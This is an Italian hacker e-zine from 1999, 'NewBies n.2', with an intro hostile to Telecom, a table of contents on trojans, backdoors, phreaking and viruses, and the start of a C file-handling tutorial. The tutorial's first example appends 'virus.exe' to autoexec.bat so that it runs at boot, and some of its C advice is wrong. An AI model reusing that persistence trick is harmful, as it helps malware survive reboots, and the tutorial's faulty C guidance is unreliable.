Newbies 2
Transcript
Newbies 2
@-,”ì'ì”,.,”ì'ì”,.,”ì'ì”,.,”ì'ì”,.,”ì'ì”,-@ | _ _ ____ _ | | | \ | | _____ _| __ )(_) ___ ___ | -+- | \| |/ _ \ \ /\ / / _ \| |/ _ Y __|-+: | |\ | __/\ V V /| |_) | | __|__ \ : | |_| \_|\___| \_/\_/ |____/|_|\___|___/ | @-,”ì'ì”,.,”ì'ì”,.,”ì'ì”,.,”ì'ì”,.,”ì'ì”,-@ NEW BIES (num 2) (data 07/03/99) [ powered By ZeroCool and N0bodY88 ] DISCLAIMER LEGALE -----------------------------------------------------------------------------IL NEWBIES STAFF NON SI ASSUME NESSUNA RESPONSABILITA' X L'UTILIZZO DELLE TECNICHE SOTTO RIPORTATE, LE QUALI SONO STATE DISTRIBUITE UNICAMENTE X CONDIVIDERE LE CONOSCENZE DA NOI "ACUISITE" (mitico edu...) E PER CERCARE QUALCUNO CON CUI CONFONTARE LE NS ESPERIENZE E LE CONOSCENZE X MIGLIORARE VICENDEVOLMENTE.....DIVERTENDOSI! N0bodY88 of NewBies Staff -----------------------------------------------------------------------------PREMESSA ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ Questa e-zine e' nata in una giornata qualsiasi di gennaio, mentre 2 newbies stavano parlando tra loro in IRC di non mi ricordo cosa. Da quel fatidico giorno la e-zine e' cresciuta, le persone che ho contattato x scrivere un articolo mi hanno dato la loro disponibilita' e entro alcuni giorni mi hanno fatto avere il loro operato. Alcune persone hanno fatto tardi x notti intere (fra cui il sottoscritto) ed hanno sacrificato il loro tempo x creare qualcosa che fosse nuovo, divertente, che ci facesse diventare + bravi, + amici, + uniti e forse...beh...forse anche + famosi...hihihi! Questo e' quello che abbiamo realizzato insieme, collaborando e scambiandoci opinioni. Se questa e-zine non vi piace, e' troppo semplice o e' stupida non scriveteci (oppure scriveteci x migliorare un art. della e-zine sfruttando le vostre conoscenze) ma se solo sara' piaciuta ad una persona, se solo un ragazzo dopo aver letto questa avra' deciso di passare a linux, di programmare in visual basic, di farsi una propria backdoor o di mettersi a studiare come si usa telnet (troppo poco attrezzato di voci nei menu x essere quello tanto decantato dovunque, ma anche troppo simpatico con il suo prompt a mo di Commodore 64) allora questa e-zine sara' servita a qualcosa. E ricordate...newbies si nasce, hacker si diventa. Buona lettura ^__^ N0bodY88 ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ INTRODUZIONE: Hey ciao benvenuti a NewBies n.2 la nostra strafigha e-zine , bhe stavolta abbiamo apportato dei cambiamenti ad esempio abbiamo letto meglio gli articoli confrontandoli con quelli gia' esistenti di altre e-zines per evitare che qualcuno faccio copiature e rippamenti vari e qui ringrazio Lord Guf x averci aiutato a trovare articoli poco edificanti contenuti nel numero 1. Cavolo io N0bodY88 siamo felicissimi di continuare quest' azzentura [sei mitico N0bodY88] e speriamo di poter dare con questo numero un taglio + tecnico alla e-zines. Grazie a tutti quelli che hanno letto il n.1 e spero che sto numero piaccia molto di + . Ringrazio RigoR MorteM , ChRoMe , Brigante, Master di SPP per averci sostenuto e aver parlato di noi nella loro e-zines ; Ringrazio Blum e quelli di Spaghetti Phreackers per il link e i consigli al nostro sito. Ringrazio gli stramitici BFI e in particolare Spirito per la sua cordialita' e disponibilita' , siete veramente mitici spero un giorno di diventare come voi . Continuate cosi' SiEtE I MiGliOrI .... Un grazie a tutti quelli che conosco , a DarkSchanider e a tutti quelli che in mirc ci hanno dato un poco disupporto morale...GRAZIEEEE. Voglio anche mettere un particolare ''saluto'' a Luce e a Mofoz che anche se la sorte avversa li ha toccati rimarrano nel cuore di tutti noi , questo e'da parte di ZeroCool x Voi e vi dedico questa frase : Non cercare di capire , Non cercare di pensare , Non cercare di credere in qualcosa in cui tu non riesci a credere stupido essere , Noi siamo cio' che tu non sei , Noi siamo la Luce [e/o la cerchiamo] e tu il buio , puoi fermare uno di noi ma non tutti . UN FUCK A TUTTI GLI ENTI e a TELECOM in particolare noi non abbiamo paura di voi ma voi si per questo volete fermarci ma mai e poi mai ci riuscirete noi siamo troppi e molti si aggiungono. Un mio saluto a tutto quelli che ci lavorano e mi danno una mano a fotterla. Ciaoz da ZeroCool ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍËÍËÍËÍËÍËÍËÍËÍËÍËÍËÍËÍËÍËÍËÍËÍËÍËÍËÍËÍËÍËÍËÍËÍËÍËÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ Í» º ARTICOLO ÌÍÎÍÎÍÎÍÎÍÎÍÎÍÎÍÎÍÎÍÎÍÎÍÎÍÎÍÎÍÎÍÎÍÎÍÎÍÎÍÎÍÎÍÎÍÎ͹ AUTORE º ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ Í¹ ³NOVITA' DAL MONDO NewBies Staff ³ ³ CONOSCETE NETRUNNERS? NO??? E COME FATE A VIVERE?????? N0bodY88 ³ ³ DIAMO AD AVATAR CIO' CHE E' DI AVATAR N0bodY88 ³ ³INFO SUGLI ALLEGATI NewBies Staff ³ ³ 2 PAROLE SUGLI ALLEGATI N0bodY88 ³ ³PROGRAMMAZIONE NewBies Staff ³ ³ C TUTORIAL [ SECONDA PARTE ] ElectroRipper ³ ³ VB TUTORIAL [ SECONDA PARTE ] R0n|n ³ ³ PASCAL TUTORIAL [ PRIMA PARTE ] T0rment0 ³ ³ JAVA TUTORIAL [ PRIMA PARTE ] SkHammer ³ ³ VB AVANZATO Master ³ ³ JAVASCRIPT Master ³ ³ COME ELIMINARE I BANNER DALLE HP Master ³ ³ANARCHIA, BANCHE, BOMBE ET SIMILI NewBies Staff ³ ³ STINKY BOMB Avatar666 ³ ³ DIVERTIRSI A SCUOLA ElectroRipper ³ ³ COME FOTTERE I SOLDI AL VS VICINO IN MODO DEL TUTTO LEGALE N0bodY88 ³ ³ SCHERZI TELEFONICI ElectroRipper ³ ³CRITTOGRAFIA E STEGANOGRAFIA NewBies Staff ³ ³ CRITTOGRAFIA E SEMPLICI IDEE X FARSI QUALKE PROGRAMMINO N0bodY88 ³ ³ STEGANOGRAFIA FOR DUMMIES Nietzsche ³ ³ STEGANOGRAFIA CON IL PROGRAMMA IME Nietzsche ³ ³ CRITTOGRAFIA FOR DUMMIES Nietzsche ³ ³CRACKING NewBies Staff ³ ³ CRACK FOR BEGINNERS ZioFill ³ ³ CRACKING QUESTO SCONOSCIUTO SpYmAsTeR ³ ³ MASTERIZZARE CHE PASSIONE KaOsS ³ ³TEORIA ³ ³ FIREWALL E PROTOCOLLI INTERNET ³ ³ SSL ³ ³ INTRODUZIONE AL RARP ³ ³ BOOTP ³ ³ IP SPOOFING & IP MASQUERADE ³ ³ SMTP ³ ³TRADUZIONI ³ ³ TROJAN HORSES, VIRUSES AND WORMS ³ ³ A HACKER by VAN HAUSER ³ ³INTERVISTE ³ ³ INTERVISTA A UN HACKER/PHREAKER ³ ³ INTERVISTA A UN EX CRACKER ORA HACKER ³ ³PHREAKING ³ ³ TELEFONARE GRATIS ³ ³ FORSE NON SAPEVATE CHE... ³ ³ COSA C'E' DIETRO AD UN GREEN ³ ³HACKING DI TUTTO DI PIU' E DIVERSI ART. MOLTO INTERESSANTI ³ ³ HOTLINES QUESTO SCONOSCIUTO ³ ³ FTP BOUNCE ³ ³ VIRUS X DOS 6.1 SorrowThePrince³ ³ QUALCHE INFO SU ANGELFIRE ³ ³ COME MANTENERE LA VOSTRA PAGINA "ILLEGALE" ³ ³ COME CAMBIARE ICONE CON REGEDIT ³ ³ USARE ZAP2 X RENDERSI INVISIBILE ³ ³ FINGER ³ ³ COME MODIFICARE SPEAKEASY X NON ESSERE BECCATI ³ ³ COS'E'E COME SI USA UNA SHELL ³ ³ PROGETTO FUCKTEL - TELECOZZ E VARIE COSETTE UTILI ³ ³ DIRECTORY DI SISTEMA CON DESCRIZIONE ³ ³ INSTALLAZIONE LINUX Alighieri³ ³ LOGHI OEM ³ ³ COME REGISTRARE UN CANALE CON IL CHANSERV ³ ³ OVERCLOCKING ³ ³ IP ROUTING ³ NewBies Staff The Duke Brigante Darkman Darkman Ramesse N0bodY88 NewBies Staff Wurz Wurz NewBies Staff N0bodY88 N0bodY88 NewBies Staff Fusyllo ]Akuma[ ZeroCool NewBies Staff Nemesis Ghimlet SkHammer Biavo RigoR MorteM RaG3 Fritz Meew Fritz ZeroCool Zinco Dante RigoR MorteM Newbie 1.1 ULNTWH99 ZeroCool ³ TROJAN FOR DUMMIES Nietzsche ³ ³ PRIVACY QUESTA SCONOSCIUTA Alby ³ ³ GUIDA DI BASE AL SOCIAL ENGEENERING ElectroRipper ³ ³ DOVE E COME METTERE BACKDOOR LordDestruction³ ³ QUALCHE MUST HAVE (URL INTERESSANTI) Fritz ³ ³ LINUX: COME METTERE UN FTP ANONIMO T0rment0 ³ ³ LISTA PROXY Sciaman ³ ³ HACKING DI WINDOZZO NT Game ³ ³ CARATTERISTICHE DISTRIBUZIONI LINUX T0rment0 ³ ³ METTERE L'APPROVED CON AGENT Fritz ³ ³ COME TOGLIERE I TROJAN Lopks ³ ³ L'MP3: QUESTO SCONOSCIUTO Sciaman ³ ³ OVERCLOCK Dante alighieri³ ³ PICCOLI TRUCCHI PER NEWBIES T0rment0 ³ ³ COME DIVENTARE OP CON UNA BOTTA DI...CULO P0nic0 ³ ³SALUTI ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ÄÙ ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ ²°°°°°°°°°°°ÛÛÛ°°°ÛÛ°°ÛÛÛÛÛÛ°°ÛÛ°°°°°°°ÛÛ°°ÛÛ°°ÛÛÛÛÛÛÛÛÛÛ°°°°°°°°°°°ÛÛ°°°°°°°² ²°°°°°°°°°°°ÛÛÛÛ°°ÛÛ°°ÛÛ²²ÛÛ°°°ÛÛ°°°°°ÛÛ°°°°°°°Û°°°ÛÛ°°°Û°°°°°°ÛÛÛ°°ÛÛ°°°°°°°² ²°°°°°°°°°°°ÛÛ°ÛÛ°ÛÛ°°ÛÛ²²ÛÛ°°°°ÛÛ°°°ÛÛ°°°°ÛÛ°°ÛÛÛ°ÛÛ°ÛÛÛ°°°°°ÛÛ²ÛÛ°°°°°°°°°°² ²°°°°°°°°°°°ÛÛ°°ÛÛÛÛ°°ÛÛ²²ÛÛ°°°°°ÛÛ°ÛÛ°°°°°ÛÛ°°°°°°ÛÛ°°°°°°°°ÛÛÛÛÛÛÛ°°°°°°°°°² ²°°°°°°°°°°°ÛÛ°°°ÛÛÛ°°ÛÛÛÛÛÛ°°°°°°ÛÛÛ°°°°°°ÛÛ°°°°°°ÛÛ°°°°°°°ÛÛ°°°°°ÛÛ°°°°°°°°² ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º º³ CONOSCETE NETRUNNERS? NO??? E COME FATE A VIVERE?????? ³º ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ NetRunners per i poki newbies e hackers che non la conoscono e' un mitica e-zine frutto del lavoro di un gruppo hacker italiano che se non raggruppa i migliori elementi italiani... be ci va vicino! Il gruppo si chiama SPP (SpiPPoLaTorI) e sono formati da un gruppo di amici con conoscenze diciamo...vicine all'infinito+1...eheheh Il sito in cui DOVETE andare a scaricare la ezine arrivata al bellissimo numero 3 dedicato a netcat [ se non sapete cos'e'...scaricatela :-) ], si trova all'url: http://members.tripod.com/~teresacanis/ e non fate i tirchi ma date un okkiata all'ottimo sito realizzato da RigoR MorteM con l'aiuto di Teresa x la grafica...poi ditemi che non vi passiamo buoni link :P Colgo l'occasione x salutare ChRoMe e tutti quelli che aiutano il prog. NetRunners e buona fortuna x il futuro :) N0bodY88 PS: quasi dimenticavo....un grazie x averci dato una mano a ChRoMe e RigoR sia x la ricerca di nuovi articoli, che x averci fatto pubblicita' :-) ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º º³ DIAMO AD AVATAR CIO' CHE E' DI AVATAR ³º ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ Grazie alla segnalazione di Avatar, il NewBies Staff con me in testa si scusa con Avatar666, dato che nel primo numero di NewBies i green che sono stati dati erano stati "copiati e incollati" da una vecchia versione del Cookbook del mitico Avatar e a lui, quale autore del txt e scopritore degli stessi, non erano stati dati alcuni meriti, se non quello di aver scoperto il numero di sua eminenza. Alle foto sulla cabina "aperta con dolcezza" (eheheheh) allegate in un altro zip al 1ø numero non possiamo aggiungere altri articoli o foto degli IHC che cmq ci hanno promesso che se faranno qualcos'altro ce lo faranno pubblicare su uno dei prossimi numeri (mitici!!!) quindi pregate a mani congiunte che forse x il 3ø num DrShade e Cyrus The Virus ci presenteranno un'altro dei loro interessantissimi articoli. :))) Ci scusiamo quindi con Spaghetti (che porta avanti un progetto importante x la scena italiana) x le le foto delle cabine prese senza dare meriti al mitico Spaghetti e ad Avatar (che le ha fatte) a cui va tutta la nostra riconoscenza e la ns gratitudine per averci fatto notare i mancati riferimenti del 1ø num. Sperando in un 2ø numero migliore ricordo a tutti gli scrittori e a tutti i newbies che se all'interno dei propri articoli si citano testi altrui va specificato chi e' l'autore o il traduttore e se e' possibile bisogna contattarlo x chiedere la pubblicazione (come avevo fatto io con il mitico X-H4ck3r). Ora vi lascio con una frase di un amico hacker americano: INFORMATION WANTS TO BE FREE...BUT REMEMBER THE AUTHOR!!! Allego qua sotto il link al sito Spaghetti Phreakers, dove tra l'altro trovate anche il mitico Cookbook di Avatar (che x dimostrare che non ci sono problemi ora che e' tutto risolto ci ha permesso di includere un art. del suo nuovo Cookbook che deve ancora uscire nella ns e-zine!!! mitico Ava66!!!) http://come.to/spaghettiphreakers/ <-- CHI NON CI VA, LEGGENDO QUESTA EZINE SI RITROVERA' 40 TROJAN INSTALLATI SU PC! ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ ²°°°°°°°°°°°°°°°°°°ÛÛ°°°°ÛÛ°°°°ÛÛÛÛ°°ÛÛÛÛÛÛÛ°°°°°°°°ÛÛÛÛÛÛÛÛÛÛÛÛÛ°Û°°°°°°°°°°°°² ²°°°°°°°°°°°ÛÛÛ°°°°ÛÛ°°°°ÛÛ°°°°ÛÛ°°°°ÛÛ°°°°°°°°°ÛÛÛ°°°°°°ÛÛÛ°°°°°°°°°°°°°°°°°°°² ²°°°°°°°°°°ÛÛ²ÛÛ°°°ÛÛ°°°°ÛÛ°°°°ÛÛÛÛ°°ÛÛ°ÛÛÛÛ°°°ÛÛ²ÛÛ°°°°°ÛÛÛ°°°°ÛÛÛ°°°°°°°°°°°°² ²°°°°°°°°°ÛÛÛÛÛÛÛ°°ÛÛ°°°°ÛÛ°°°°ÛÛ°°°°ÛÛ°°°ÛÛ°°ÛÛÛÛÛÛÛ°°°°ÛÛÛ°°°°ÛÛÛ°°°°°°°°°°°°² ²°°°°°°°°ÛÛ°°°°°ÛÛ°ÛÛÛÛÛ°ÛÛÛÛÛ°ÛÛÛÛ°°ÛÛÛÛÛÛÛ°ÛÛ°°°°°ÛÛ°°°ÛÛÛ°°°°ÛÛÛ°°°°°°°°°°°°² ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ 2 PAROLE SUGLI ALLEGATI: - regmon = prog. che serve x crackare; il suo utilizzo viene spiegato nel proprio articolo da ZioFill; - ime = Image Mesage Encryptor ver 1.0 by Christian; programma che serve x nascondere i propri messaggi all'interno di immagini con estensione .jpg inserito xche' Nietzsche ne parla in uno dei suoi articoli sulla Stenografia sembra (argomento imo molto interessante, i questo momento in cui la privacy non esistere...); - s-tools = programma usato x nascondere i propri msg in suoni o immagini; il suo utilizzo e' spiegato nel proprio articolo da Nietzsche; - ban = zip contenente un immagine e una pagina .htm grazie al quale si puo' vedere cio' di cui Master parla in uno dei suoi articoli riguardo alla morte dei ban che appaiono sulle hp free; - hackernovello = una guida in .htm che ho pensato di non addare all'interno della ezine, per mantenerla nel formato originale; questa guida fatta dal ns mitico T0rment0 (che in questo stesso numero ha anke iniziato un tutorial di Pascal utile a tutti i programmatori imo) la trovate anke sul suo sito [ http://come.to/hackernovello ]. - ocx = serve x registrare il famoso winsck.ocx il file che meta' dei programmini in rete (winnuke, portrscan e altri) richiedono x funzionare; un grazie particolare a Urkes :))) - loghioem = mitico esempio concessoci da RigoR MorteM su come cambiare una cosetta molto simpatica in win, provate e rimarrete stupiti da questo trucco imo molto bello e da me usato a scuola [dove c'e' scritto "N0bodY88 has been here" hack the planet - information wants to be free] e adesso comnciate a darmi del lamer...hihihi - anti-s.zip = in euqesto zip sono contenuti 5 documenti di un insieme di 30 doc sulle reti, e ad ogni numero di newbies aggiungeremo 5 numeri fino a pubblicarli tutti...ps complimenti Anti-s :) - zerocool.zip = mitico zip con all'interno dei numeri telefonici e dei dati sicuramente interessanti per tutti i phreakers li' fuori che avranno cosi' nuove info da "addare" ai propri archivi :) Sono anke contenute una worldlist e altre info molto utili ^_^ PS: zero 6 |\/| | ^|^ | [ [] - vecna.zip = un insieme di articoli con l'elenco aggiornato dei bug di sendmail datoci dal mitico vecna...questo insieme di articoli potrebbe essere una ezine da solo xche' con tutte le cose che sa lui...ho pensato di metterlo in uno zip a parte primo perche' sono + art molto interessanti e poi xche'...Vecna e' Vecna!!! Vecna 61m1t0!!! Dovrebbero esserci tutti questi prog acclusi, ma magari dividiamo in 2 la ezine... con tutti gli articoli che abbiamo riusciremmo a fare un numero 2 e un numero 3 :)) N0bodY88 ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ ²°°ÛÛÛÛÛÛÛÛÛÛÛÛÛ°°°ÛÛ°ÛÛÛÛÛÛÛÛÛÛÛÛÛ°ÛÛÛÛÛÛÛÛ°ÛÛÛÛÛÛ°°ÛÛ°°°°°°°°°°°°°ÛÛ°°°°°°°² ²°°°°°°°ÛÛÛ°°°°°°°°ÛÛ°°°°°°ÛÛÛ°°°°°°ÛÛ²²²²ÛÛ°ÛÛ²²ÛÛ°°°°°°°°°°ÛÛÛ°°°°ÛÛ°°°°°°°² ²°°°°°°°ÛÛÛ°°°ÛÛ°°°ÛÛ°°°°°°ÛÛÛ°°°°°°ÛÛ²²²²ÛÛ°ÛÛÛÛ°°°°ÛÛ°°°°°ÛÛ²ÛÛ°°°ÛÛ°°°°°°°² ²°°°°°°°ÛÛÛ°°°ÛÛ°°°ÛÛ°°°°°°ÛÛÛ°°°°°°ÛÛ²²²²ÛÛ°ÛÛ°ÛÛ°°°ÛÛ°°°°ÛÛÛÛÛÛÛ°°ÛÛ°°°°°°°² ²°°°°°°°ÛÛÛ°°°ÛÛÛÛÛÛÛ°°°°°°ÛÛÛ°°°°°°ÛÛÛÛÛÛÛÛ°ÛÛ°°ÛÛ°°ÛÛ°°°ÛÛ°°°°°ÛÛ°ÛÛÛÛÛÛ°°°² ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ ÕÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͸ ³ ::::::::::::::::::::::::::: | ÆÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͵ ³ Titolo: Corso di C - II Parte ³ ÆÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͵ ³ di : ElectroRipper ³ ÆÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͵ ³ Scritto il : xx/2/99 ³ ÆÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͵ ³ Pericolo: Û°°°°°°°°° ³ ÔÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ; ElectroRipper_______CORSO_DI_C________II__PARTE_________________________________ __ if ((aveteseguitolaprimaparte()) || (necapitegiaqualcosa())) { continuatealeggere(); } else { leggetevilaprimaparte(); } // eheh, mi divertono sempre queste stronzate :) ______________________________________________________________________________ Allora, comincio dicendo che CRUSAD3R, autore della prima parte, nonche' cugino del sottoscritto, e' morto, e ha espresso nel testamento, come sua ultima volonta', il desiderio che io continuassi sto benedetto corso di C. Prima di cominciare a parlare della gestione dei file devo introdurre le strutture. Dunque, mettiamo per esempio che vogliate fare un gioco di corsa di automobili (ehhhhhhhhh! e state leggendo questo tutorial ?) Per ogni automobile vi serve sapere il nome, la velocita' massima, e i soldi posseduti dal guidatore. Sarebbe comodo se ci fosse un tipo di variabile automobile che potesse contenere tutti questi dati, non trovate ? Una variabile del genere si chiama struttura.... Es. struct automobile{ char *nome; int velmax; long soldi; }; Ecco il tipo di variabile che ci serviva ! Adesso pero' dobbiamo definire la variabile vera e' propria... Es. struct automobile auto1; struct automobile auto2; struct automobile auto3; In questo modo creiamo 3 variabili di tipo automobile chiamate auto1, auto2 e auto3. Ognuna di queste variabili conterra' al suo interno i membri della struttura automobile. Es. strcpy(auto1.nome,"Fiat 500"); auto1.soldi = 0; auto1.velmax = 150; Ovviamente, tornando all'esempio del gioco di corsa, converrebbe creare un array di automobili... Es. struct automobile automobili[10]; ------Ora vi spieghero' la gestione dei file da un punto di vista logico, cioe' non dovrete preoccuparvi di come il sistema operativo gestisce fisicamente i file, anche perche' questo richiederebbe una spiegazione a parte per ogni OS, mentre una delle caratteristiche piu' lodate del C e' la sua portabilita' da un sistema a un altro, quindi conviene piu' conoscere dei metodi generici di I/O, da potere poi usare sulla maggiorparte degli OS. Possiamo immaginare un file come un archivio contenente un certo numero di bytes ordinati, messi in fila uno di seguito all'altro. Ci sono due modi di accedere ad un file : in modo sequenziale (cioe' i bytes vengono scritti o letti in ordine, partendo dall'inizio del file), e in modo random, cioe' scrivendo o leggendo direttamente nel punto desiderato del file. I File di testo sono file formati da caratteri ascii, che non possono contenere il carattere 26 (EOF) dato che questo viene usato solo per indicare la fine del file. Ora, prima di continuare con la teoria, facciamo qualche esempio.... #include <stdio.h> main(){ FILE *ilfile; ilfile = fopen("\\autoexec.bat","a"); fprintf(ilfile,"%s","virus.exe"); fclose(ilfile); } Non mi soffermo sulle stronzate che dovreste aver gia' imparato dalla prima puntata (main e #include), e vado direttamente alla chiamata a fopen. Questa e' la funzione di stdio che serve ad aprire un file. Il valore di ritorno lo assegniamo al puntatore al tipo FILE "ilfile". Il primo argomento di fopen e' il nome del file da aprire, il secondo serve a specificare in che modo vogliamo aprire il file (in questo caso a = appending, cioe' quello che scriviamo viene messo alla fine del file, senza cancellare le righe gia' esistenti. "w" invece corrisponde a write, cioe' crea un file per scriverci dentro, se il file gia' esiste lo sovrascrive. "r" indovinate un po' a che serve ? :) Possiamo anche combinare piu' modi tra di loro per definire l'accesso al file che ci serve. Ad esempio "rwt" indica che vogliamo creare il file e poi accedervi in lettura e scrittura, trattandolo come file di testo ("t") Con fprintf scriviamo qualcosa nel file (alla fine del file in questo caso). I parametri da passare sono gli stessi di printf, ad eccezione del primo, che deve essere il puntatore a FILE. In questo caso la funzione scrive la stringa "virus.exe" alla fine del file aperto in ilfile, cioe' l'autoexec.bat. Con fclose chiudiamo il file (operazione necessaria, altrimenti tutte le modifiche vanno perse). Quando operiamo su un file aperto come file di testo troviamo alcune limitazioni. Per prima cosa il carattere 26 viene considerato come fine del file, inoltre le funzioni seguono alcune convenzioni del sistema operativo. Ad esempio nel DOS, quando nel file si incontra la combinazione di caratteri CRLF (Return+Linefeed) viene letto un solo carattere, cioe' \n (se non sapete cos'e' dovreste andare a rivedervi la prima parte). Se vogliamo leggere il contenuto del file cosi' com'e', dobbiamo aprirlo in modo binario, anziche' come file di testo. Al posto di "t" useremo quindi "b". Es. ilfile = fopen("\\command.com","rb"); In tal modo tutti i caratteri verranno letti esattamente come si trovano nel file, senza conversioni. Scrivendo un numero in un file binario questo verra' scritto sotto forma di caratteri ascii, occupando quindi due soli byte per un int (risparmiando quindi spazio. Un altro vantaggio dell'uso dei file binari). Per leggere da un file, invece, possiamo usare la funzione fscanf, simile alla scanf, tranne che per il primo parametro, che deve essere il puntatore a FILE. Es. fscanf(ilfile,"%d",&numero); -----Il programma apre automaticamente alcuni file... stdout ridirezionato) stdin stderr stdprn Es. = La periferica standard di output (video, ma puo' essere = " " " = " " " = Stampante Standard (tastiera) (video) (stampante) fscanf(stdin,"%d",&ilnumero); " " input error // legge un numero dalla tastiera ----Ritornando ai file binari, un'importante funzione e' fwrite. Es. #include <stdio.h> main(){ FILE *ilfile; int ilnumero; ilfile = fopen("prova.prv","wb"); fwrite(&ilnumero,sizeof(ilnumero),1,ilfile); fclose(ilfile); } Il primo argomento e' l'indirizzo della variabile, il secondo la dimensione in bytes, il terzo il numero di dati e il quarto il file. sizeof ritorna la dimensione in bytes della variabile. Es. #include <stdio.h> main(){ FILE *ilfile; int inumeri[100]; ilfile = fopen("prova.prv","wb"); fwrite(inumeri,sizeof(inumeri[0]),100,ilfile); fclose(ilfile); } In questo caso scriviamo nel file un intero array di int. La & davanti al primo argomento in questo caso non e' necessaria, dato che scrivendo il nome di un array senza numero ci si riferisce all'indirizzo in memoria dove inizia 